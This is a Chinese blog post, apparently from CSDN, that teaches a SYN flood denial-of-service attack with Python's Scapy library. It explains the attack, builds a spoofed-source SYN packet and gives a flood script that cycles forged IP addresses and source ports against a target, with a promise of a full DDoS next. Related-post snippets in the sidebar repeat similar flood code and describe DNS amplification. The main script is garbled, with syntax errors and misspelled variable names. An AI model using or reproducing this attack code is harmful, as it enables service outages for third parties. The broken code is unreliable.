python攻击网站的方式_Python项目 基于Scapy实现SYN泛洪攻击的方法

最新推荐文章于 2024-05-25 16:59:50 发布
最新推荐文章于 2024-05-25 16:59:50 发布
阅读量502 收藏 2
点赞数
文章标签: python攻击网站的方式

python3版本的Scapy--Scapy3k来实现一个简单的DDos。

首先实现SYN泛洪攻击(SYN Flood,是一直常用的DOS方式之一,通过发送大量伪造的TCP连接请求,使被攻击主机资源耗尽的攻击方式)。TCP三次握手的过程在这里就不再赘述,SYN攻击则是客户端向服务器发送SYN报文之后就不再响应服务器回应的报文,由于服务器在处理TCP请求时,会在协议栈留一块缓冲区来存储握手的过程,如果超过一定的时间没有接收到客户端的报文,那么本次连接在协议栈中存储的数据就会被丢弃。攻击者如果利用这段时间发送了大量的连接请求,全部挂起在半连接状态,这样将不断消耗服务器资源,直到拒接服务。

Scapy是一个强大的交互式数据包处理程序,可以用来发送、嗅探、解析和伪造网络数据包。首先需要安装Scapy3k:

sudo pip3 install scapy-python3

现在学习一下scapy的使用方法:

sudo scapy(scapy发送数据包需要root权限)

(警告信息是因为有一些依赖包没有安装,但是我们本次实验不需要使用我就不装了)

现在我们使用Scapy构造一个简单的数据包看一下:

pkt = IP(dst = "192.168.0.10")

接下来我们就构造一个SYN包:

pkt = IP(src="202.121.0.12",dst="192.168.0.100")/TCP(dport=80,flags="S")

(我们构造了一个IP包和TCP包并将它们组合到一块,这样就有了一个完整的TCP数据包,否则是无法发送出去的,IP包中我)们指定了源IP地址src和目的IP地址dst,其中src是我们伪造的地址,flags的值设定为S说明要发送的是SYN数据包)

代码实现:

具体代码如下:

import random

import scapy.all import *

def synFlood(tgt,dPort):

srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']

from sPort in range(1-24,65535):

index = random.randrange(4)

ipLayer = IP(stc = stcList[index].dst = tgt)

tcoLayer = TCP(sport = sPort,dport = dPort,flags = "S")

packet = ipLayer/tcpLayer

send(packet)

定义了srcList用于存放伪造的IP地址,之后定义了一个循环,作用是每次发送数据包源端口都改变,可以看到在构造TCP数据包的时候我们增加了一个参数sport,循环中改变的端口号就是给了sport这个参数。我们还调用random.randrange()函数来随机从srcList中获取一个伪造的IP地址。本次实验就算完成,下次实验实现一个完整的Ddos过程。

以上这篇Python项目 基于Scapy实现SYN泛洪攻击的方法就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持。

weixin_39918043
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于Scapy的传统网络攻击实现
a1379292747的博客
09-14 3206
Scapy是一个由Python编写的强大工具,目前很多优秀的网络扫描攻击工具都使用了这个模块。也可以在自己的程序中使用这个模块来实现对网络数据包的发送、监听和解析。Scapy还是一个功能强大的交互式数据包操作程序。它能够伪造或解码大量协议的数据包,通过线路发送,捕获它们,匹配请求和回复等等。Scapy可以轻松处理大多数经典任务,如扫描,跟踪路由,探测,单元测试,攻击或网络发现。它可以取代hping,arpspoof,arp-sk,arping,甚至是Nmap,tcpdump和tshark的某些部分。
[笔记]使用Pythonscapy实现SYN洪水攻击
qq_61690448的博客
12-22 2360
[笔记]实现SYN泛洪攻击
python攻击网站方式_python web框架Flask——csrf攻击
weixin_39836876的博客
11-23 743
CSRF是什么?(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用也就是人们所知道的钓鱼网站。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相...
Python编写的可以扫描和攻击网络的脚本
最新发布
2403_83442903的博客
05-25 520
介绍:NetAtAck2是一个用Python编写的可以扫描和攻击网络的脚本①安装。
只用20行Python代码就攻破了网站登录
公众号:Python研究者
03-12 1831
大家好,我是辰哥~今天教大家用Python代码攻破网站登录(在测试靶机上进行实验),原理上是抓包和改包,如果学过的爬虫的话,相信你会快看懂这篇文章测试靶机为DVWA,适合DVWA暴力破解模...
syn 攻击脚本 python_python 模拟syn攻击
weixin_39571087的博客
11-29 446
!/usr/bin/pythoncoding=utf-8import optparsefrom scapy.all import *def synFlood(src, tgt):# TCP源端口不断自增一,而目标端口513不变for sport in range(1024, 65535):IPlayer = IP(src=src, dst=tgt)TCPlayer = TCP(sport=spor...
scapy模拟攻击_用scapy模拟DNS放大攻击
weixin_39761822的博客
02-22 484
首先,DNS放大攻击,简单解释有两点: 1.伪造源IP为其他人的ip地址 2.被请求的记录,要求比较大,比如TXT格式,4000KB 在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大攻击。 可以用pythonscapy模拟: from scapy import * a首先,DNS放大攻击,简单解释有两点:1.伪造源IP为其他人的ip地址2.被请求的记录,要求...
Python项目 基于Scapy实现SYN泛洪攻击方法
09-19
**Python项目:基于Scapy实现SYN泛洪攻击** SYN泛洪攻击是一种常见的拒绝服务(Denial of Service, DoS)攻击手段,它利用TCP三次握手过程中的漏洞,通过发送大量伪造的SYN请求来消耗目标服务器的资源,使其无法...
python2.7使用scapy发送syn实例
09-16
主要介绍了python2.7使用scapy发送syn实例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
Python黑客攻击的几种技术,你得了解一下
weixin_58753619的博客
07-29 2752
Python提供了丰富的模块,几乎可以直接用于任何黑客领域。对于黑客模块没有提供的区域,可以使用c类型调用操作系统提供的本机API。简而言之,Python可以用于攻击几乎任何领域,如应用程序、Web、网络、系统等。下面描述每个领域中的Python黑客技术。应用程序黑客您可以将任何DLL或源代码插入正在运行的应用程序中,拦截用户的键盘输入以窃取密码。此外,黑客攻击代码还可以插入图片文件,传遍网络。Web黑客网络黑客攻击可以进行网络检查,搜索系统的开放端口,收集和分析网络上的数据包,进行网络嗅探。...
如何用Python进行DDOS攻击?【网络攻防篇】
qq_68725483的博客
10-21 660
【代码】如何用Python进行DDOS攻击?【网络攻防篇】
测试syn-flood等泛洪攻击的小软件
10-26
可以模拟syn flood udp flood等泛洪攻击的一款小软件,360会报警。
python网站攻击-利用Python进行Web渗透测试(十):密码攻击
weixin_39907713的博客
11-11 1603
本篇将会涉及:密码攻击测试密码攻击测试的方法密码和账户策略密码攻击测试是怎么进行的密码攻击可能是暴力破解中最常见的一种类型,广泛的被使用在渗透测试的各个领域,比如Web应用、WiFi密码破解等。密码攻击又称为口令攻击,只要攻击者获得了用户的密码口令,就能够获取用户所拥有的所有权限。而密码攻击的一个主要方式就是字典攻击,通常在通过网站的扫描探测器扫描到了网站的后台目录,就可以使用字典进行密码测试了。...
白帽黑客网络攻防与Python编程
10-26
为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 本套教程采用最新版的Kali Linux系统为基础进行讲解,减少大家的入门难度,紧跟技术发展的步伐。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。  
python3+scapy扫描获取局域网主机ip和mac
热门推荐
##$_$##
05-08 1万+
python3+scapy扫描获取局域网主机ip和mac
Scapy3.0 Documentation ( Download and Installation )
天行健,君子以自强不息
04-29 973
说明:写到这里来,只是因为原文链接打开太慢了,至于翻译什么的就不误导大家了,还是原文好看原文链接:http://phaethon.github.io/scapy/api/installation.htmlDownload and InstallationOverviewInstallPython 3.x.InstallScapyusing pip or by cloning/installi...
Python编程——使用scapy模块对局域网的某主机进行ARP欺骗和攻击
橘子女侠
03-08 2316
1. ARP协议 ARP(Address Resolution Protocol,地址解析协议),位于TCP/IP协议栈中的网络层,负责将某个IP地址转化成对应的MAC地址。 (1) 主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址; (2) 收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询...
Scapy实现SYN泛洪攻击
05-18
实现SYN泛洪攻击,可以使用Scapy来构造大量的SYN数据包,然后发送给目标主机。 下面是一个简单的示例代码: ```python from scapy.all import * # 目标IP地址 target_ip = "192.168.1.1" # 目标端口号 target_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值